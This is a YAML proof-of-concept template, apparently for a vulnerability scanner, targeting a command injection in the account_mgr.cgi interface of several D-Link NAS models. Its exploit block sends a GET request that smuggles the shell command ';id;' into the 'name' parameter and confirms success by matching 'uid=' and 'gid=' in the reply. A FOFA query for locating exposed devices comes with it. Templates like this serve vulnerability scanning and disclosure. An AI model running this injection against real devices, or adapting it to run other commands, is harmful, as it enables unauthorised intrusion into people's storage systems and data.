product: D-Link
vName: D-Link多款产品account_mgr.cgi接口远程命令执行
type: 命令执行
vID: [ ]
level: 3
vDesc: D-Link DNS-320等都是中国友讯（D-Link）公司的一款NAS（网络附属存储）设备。D-Link多款产品存在安全漏洞，该漏洞源于对参数name的错误操作会导致操作系统命令注入。以下产品及版本受到影响：D-Link DNS-320、DNS-320LW、DNS-325和DNS-340L 20241028版本及之前版本。
version: D-Link DNS-320、DNS-320LW、DNS-325和DNS-340L 20241028版本及之前版本。
note: ''
search:
  FOFA: app="D_Link-DNS-ShareCenter"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247487762&idx=1&sn=a25eeab4481350dc19897a38bb313f5e&chksm=974b9c15a03c150345340d9d369c94d55c2c09cdcc8328fb140109e9a753eb0550d703dd390f&scene=178&cur_album_id=2873032428486115330#rd
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';id;'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - uid=
              - gid=
            logic: 'and'